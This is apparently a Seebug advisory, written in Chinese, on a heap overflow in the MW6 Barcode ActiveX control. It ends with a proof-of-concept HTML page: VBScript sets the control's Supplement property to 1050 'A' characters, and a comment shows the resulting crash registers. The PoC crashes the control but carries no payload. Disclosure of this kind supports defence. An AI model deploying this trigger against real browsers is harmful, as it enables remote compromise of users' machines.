MW6 Barcode ActiveX控件远程缓冲区溢出漏洞

2009-02-02T00:00:00
ID SSV:4695
Type seebug
Reporter Root
Modified 2009-02-02T00:00:00

Description

MW6 Barcode ActiveX是用于创建一维条码的工具。

MW6 Barcode ActiveX的实现上存在缓冲溢出漏洞,远程攻击者可能利用此漏洞控制用户客户端系统。

Barcode.MW6Barcode.1 ActiveX控件(Barcode.dll)在处理超长的Supplement参数数据时存在堆溢出问题,远程恶意网站可以通过包含超长参数的网页ActiveX调用在用户客户端系统上执行任意指令。

MW6 Technologies Barcode ActiveX 3.x 厂商补丁:

MW6 Technologies

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.mw6tech.com/ target=_blank rel=external nofollow>http://www.mw6tech.com/</a>

                                        
                                            
                                                &lt;html&gt;
-----------------------------------------------------------    &lt;br/&gt;
Author : Houssamix                                                &lt;br/&gt;
-----------------------------------------------------------    &lt;br/&gt;
MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow Poc    &lt;br/&gt;
-----------------------------------------------------------    &lt;br/&gt;
&lt;!--

http://www.mw6tech.com/download.html

Report for Clsid: {14D09688-CFA7-11D5-995A-005004CE563B}        
RegKey Safe for Script: Faux                                     
RegKey Safe for Init: Faux                                        
Implements IObjectSafety: Vrai                                     
IDisp Safe:  Safe for untrusted: caller,data                        
IPersist Safe:  Safe for untrusted: caller,data                      
IPStorage Safe:  Safe for untrusted: caller,data                      

Registers:                                                            
--------------------------------------------------                    
EIP 00B5294E                                                        
EAX 41414141 &lt;====                                                         
EBX 00038660                                                         
ECX 00FA1EF8                                                          
EDX 00030608                                                         
EDI 00000000                                                    
ESI 00FA1EF8                                                          
EBP 0013F2A0                                                         
ESP 0013F278 

Block Disassembly: 
--------------------------------------------------
B5294E    MOV ECX,[EAX]      &lt;--- CRASH                                            
--&gt;

&lt;object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' &gt;&lt;/object&gt;
&lt;script language='vbscript'&gt;


arg1=String(1050, &quot;A&quot;)

target.Supplement = arg1

&lt;/script&gt;